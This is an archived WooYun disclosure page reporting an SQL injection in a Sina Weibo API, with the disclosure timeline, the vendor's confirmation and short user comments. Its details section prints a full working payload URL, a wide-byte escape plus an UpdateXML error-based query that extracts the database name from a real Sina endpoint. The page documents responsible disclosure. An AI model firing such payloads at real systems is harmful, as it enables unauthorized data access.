当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057217

漏洞标题:新浪某API接口SQL注射

相关厂商:新浪

漏洞作者: Jannock

提交时间:2014-04-15 22:30

修复时间:2014-05-30 22:30

公开时间:2014-05-30 22:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-15: 细节已通知厂商并且等待厂商处理中
2014-04-17: 厂商已经确认,细节仅向厂商公开
2014-04-27: 细节向核心白帽子及相关领域专家公开
2014-05-07: 细节向普通白帽子公开
2014-05-17: 细节向实习白帽子公开
2014-05-30: 细节向公众公开

简要描述:

新浪某API接口SQL注射,好像是重要的库,没细测。

详细说明:

http://api.sina.com.cn/weibo/wb/users_show.json?uid=1787467502%df',0,UpdateXML(1,CONCAT(0x5b,mid((SELECT database()),1,32),0x5d),1),1397571500)%23&source=2835469272&callback=STK_13975707689683

漏洞证明:

1.jpg


2.jpg

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-04-17 14:32

厂商回复:

感谢关注新浪安全,涉及的相关接口比较多,我们统一排查处理,

最新状态:

暂无


漏洞评价:

评论

  1. 2014-04-15 22:33 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    一哥

  2. 2014-04-15 22:34 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    我一看洞主就知道专搞新浪三十年

  3. 2014-04-15 23:02 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    哟西,花姑娘~~~

  4. 2014-04-16 00:34 | 只发通用型 ( 实习白帽子 | Rank:93 漏洞数:14 | 刷通用型奖金小号)

    一哥重出江湖

  5. 2014-04-16 01:38 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    这个屌

  6. 2014-05-17 15:02 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    宽字节+报错